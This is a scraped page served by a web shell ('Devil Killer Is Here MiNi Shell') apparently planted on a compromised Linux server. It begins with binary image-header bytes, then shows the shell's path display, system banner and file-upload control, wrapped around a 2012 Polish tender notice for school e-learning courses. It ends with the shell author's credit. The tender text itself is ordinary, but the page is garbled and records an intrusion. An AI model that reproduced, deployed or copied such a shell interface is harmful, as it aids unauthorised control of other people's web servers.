JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120604/185634-N-2012.html

<p class="kh_header"><b>Przemyśl: Opracowanie materiałów i prowadzenie kursów e-learningowych realizowanych w ramach projektu Szansa sukcesu</b><br>
<b>Numer ogłoszenia: 185634 - 2012; data zamieszczenia: 04.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Usługowo-Hotelarskich i Gastronomicznych , ul. Bakończycka 11, 37-700 Przemyśl, woj. podkarpackie, tel. 0-16 6788486, faks 0-16 6788486.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsu-hig.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół Ponadgimnazjalnych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie materiałów i prowadzenie kursów e-learningowych realizowanych w ramach projektu Szansa sukcesu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług związanych z prowadzeniem kursów 
e-learningowych przygotowujących do zdania egzaminu maturalnego na poziomie podstawowym oraz egzaminu potwierdzającego kwalifikacje zawodowe, realizowanych 
w ramach projektu Szansa sukcesu w Zespole Szkół Usługowo-Hotelarskich 
i Gastronomicznych w Przemyślu współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia 
i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, nr Konkursu 16/POKL/9.2/2010. Kursy e_larningowe  prowadzone będą od października 2012r. do 30 kwietnia 2013r. 
W ramach umowy Wykonawca winien zorganizować 8 rodzajów kursów prowadzonych dla grup ok. 5 osobowych:
1.	kurs e-learningowy przygotowujący do matury z matematyki, 
2.	kurs e-learningowy przygotowujący do matury z j. polskiego, 
3.	kurs e-learningowy przygotowujący do matury z j. niemieckiego, 
4.	kurs e-learningowy przygotowujący do matury z j. angielskiego, 
5.	kurs e-learningowy przygotowujący do egzaminu potwierdzającego kwalifikacje zawodowe w zawodzie Technik Hotelarstwa
6.	kurs e-learningowy przygotowujący do egzaminu potwierdzającego kwalifikacje zawodowe w zawodzie Technik Usług Fryzjerskich,
7.	kurs e-learningowy przygotowujący do egzaminu potwierdzającego kwalifikacje zawodowe w zawodzie Technik Organizacji Usług Gastronomicznych,
8.	kurs e-learningowy przygotowujący do egzaminu potwierdzającego kwalifikacje zawodowe w zawodzie Technik Żywienia i Gospodarstwa Domowego,
Wykonawca w ramach umowy oprócz prowadzenia kursów zobowiązany jest opracować bądź zaktualizować umieszczone przez Zamawiającego na platformie edukacyjnej materiały (wypracowane na poprzednich kursach realizowanych w ramach projektu), uwzględniając dla kursów e-learningowych przygotowujących do matury standardy wymagań będących podstawą przeprowadzania sprawdzianów i egzaminów zawarte w rozporządzeniu MEN z dnia 10 sierpnia 2001r.(Dz.U. z 2001r. Nr 92, poz. 1020 z późn. zm.), a dla kursów e-learningowych przygotowujących do egzaminu potwierdzającego kwalifikacje zawodowe standardy wymagań będących  podstawą przeprowadzenia egzaminu potwierdzającego kwalifikacje zawodowe zawarte w rozporządzeniu MEN z dnia 10 marca 2010r. (Dz.U. z 2010r. Nr 103 poz. 652 z późn. zm). Wykonawca winien opublikować materiały na szkolnej platformie edukacyjnej Librus. Materiały należy opracować w oparciu o program przedstawiony Zamawiającemu do akceptacji pod kątem ich zgodności ze standardami wymagań zawartymi w wyżej wymienionych rozporządzeniach Ministra Edukacji Narodowej. 
	Kursy odbywać się będą w trybie korespondencyjnym z wykorzystaniem metody e-learning oraz interaktywnego systemu konsultacji i doradztwa. Uczestnicy kursu otrzymywać będą materiały szkoleniowe oraz testy sprawdzające sukcesywnie umieszczane na platformie edukacyjnej -przynajmniej 25 pakietów w okresie realizacji dla każdego rodzaju kursu (pakiet -opracowany tematycznie w formie elektronicznej zakres materiału wraz z elementami sprawdzającymi wiedzę uczniów). Wykonawca zobowiązany jest również udzielać wskazówek metodyczno-organizacyjnych uczestnikom kursu, monitorować działania uczestników kursu na platformie (motywowanie, śledzenie i raportować na bieżąco działania uczestników kursu), organizować spotkania stacjonarne (co najmniej 2 w każdym półroczu), prowadzić dokumentację związaną z kursami, tj. prowadzenie dziennika dla każdego rodzaju kursu, opracować plan i program kursu, testy sprawdzające wiedzę i umiejętności uczniów (na początek i koniec każdego rodzaju kursu) oraz sprawozdań z przeprowadzonych testów.
Wskazana powyżej liczebność grup po przeprowadzeniu rekrutacji może ulec zwiększeniu (max do 10 osób), nie wpłynie to jednak na zwiększenie wynagrodzenia Wykonawcy.
Wykonywanie zleconych zadań odbywać się będzie z wykorzystaniem szkolnej platformy edukacyjnej Librus udostępnionej przez Zamawiającego, oraz z wykorzystaniem materiałów opracowanych na poprzednich kursach i umieszczonych na platformie edukacyjnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.42.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na podstawie oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w stosunku do Wykonawcy który oświadczy, że dysponuje bądź będzie dysponował osobami zdolnymi do wykonania zamówienia oraz wskaże do wykonania niniejszego zamówienia osoby spełniające kryteria ustalone przez Zamawiającego: a. do prowadzenia kursów e-learningowych przygotowujących do egzaminów maturalnych - posiadające kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). b. do prowadzenia kursów e-learningowych przygotowujących do egzaminów potwierdzających kwalifikacje zawodowe w zawodach Technik Usług Fryzjerskich, Technik Hotelarstwa, Technik Organizacji Usług Gastronomicznych, Technik Żywienia i Gospodarstwa Domowego - posiadające kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). W celu potwierdzenia spełnienia powyższych warunków Wykonawca zobowiązany jest złożyć imienny wykaz osób które będą uczestniczyć w wykonaniu zamówienia zawierający co najmniej: imię i nazwisko, informację na temat wykształcenia, doświadczenia zawodowego, uprawnień i ukończonych szkoleń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w stosunku do Wykonawcy który oświadczy, że dysponuje bądź będzie dysponował osobami zdolnymi do wykonania zamówienia oraz wskaże do wykonania niniejszego zamówienia osoby w ilości wymaganej przez Zamawiającego oraz spełniające kryteria ustalone przez Zamawiającego: a. do prowadzenia kursów e-learningowych przygotowujących do egzaminów maturalnych - co najmniej 1 osoba do prowadzenia każdego rodzaju kursu posiadająca kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). b. do prowadzenia kursów e-learningowych przygotowujących do egzaminów potwierdzających kwalifikacje zawodowe w zawodach Technik Usług Fryzjerskich, Technik Hotelarstwa, Technik Organizacji Usług Gastronomicznych, Technik Żywienia i Gospodarstwa Domowego - co najmniej 1 osoba do prowadzenia każdego rodzaju kursu posiadająca kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). W celu potwierdzenia spełnienia powyższych warunków Wykonawca zobowiązany jest złożyć imienny wykaz osób które będą uczestniczyć w wykonaniu zamówienia zawierający co najmniej: imię i nazwisko, informację na temat wykształcenia, doświadczenia zawodowego, uprawnień i ukończonych szkoleń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w stosunku do Wykonawcy który oświadczy, że dysponuje bądź będzie dysponował osobami zdolnymi do wykonania zamówienia oraz wskaże do wykonania niniejszego zamówienia osoby w ilości wymaganej przez Zamawiającego oraz spełniające kryteria ustalone przez Zamawiającego: a. do prowadzenia kursów e-learningowych przygotowujących do egzaminów maturalnych - co najmniej 1 osoba do prowadzenia każdego rodzaju kursu posiadająca kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). b. do prowadzenia kursów e-learningowych przygotowujących do egzaminów potwierdzających kwalifikacje zawodowe w zawodach Technik Usług Fryzjerskich, Technik Hotelarstwa, Technik Organizacji Usług Gastronomicznych, Technik Żywienia i Gospodarstwa Domowego - co najmniej 1 osoba do prowadzenia każdego rodzaju kursu posiadająca kwalifikacje: wykształcenie wyższe, pedagogiczne, kierunkowe (stosowne do wymienionych rodzajów kursów), minimum 3-letnie doświadczenie zawodowe w pracy jako nauczyciel w szkole ponadgimnazjalnej, ukończone szkolenie z zakresu obsługi platformy edukacyjnej Librus (znajomość zasad publikowania materiałów na platformie edukacyjnej Librus oraz administrowania nimi). W celu potwierdzenia spełnienia powyższych warunków Wykonawca zobowiązany jest złożyć imienny wykaz osób które będą uczestniczyć w wykonaniu zamówienia zawierający co najmniej: imię i nazwisko, informację na temat wykształcenia, doświadczenia zawodowego, uprawnień i odbytych szkoleń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny na podstawie oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsu-hig.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu, 37-700 Przemyśl, ul. Bakończycka 11 - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 09:00, miejsce: Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu, 37-700 Przemyśl, ul. Bakończycka 11 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Szansa sukcesurealizowany w Zespole Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, nr Konkursu 16/POKL/9.2/2010.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com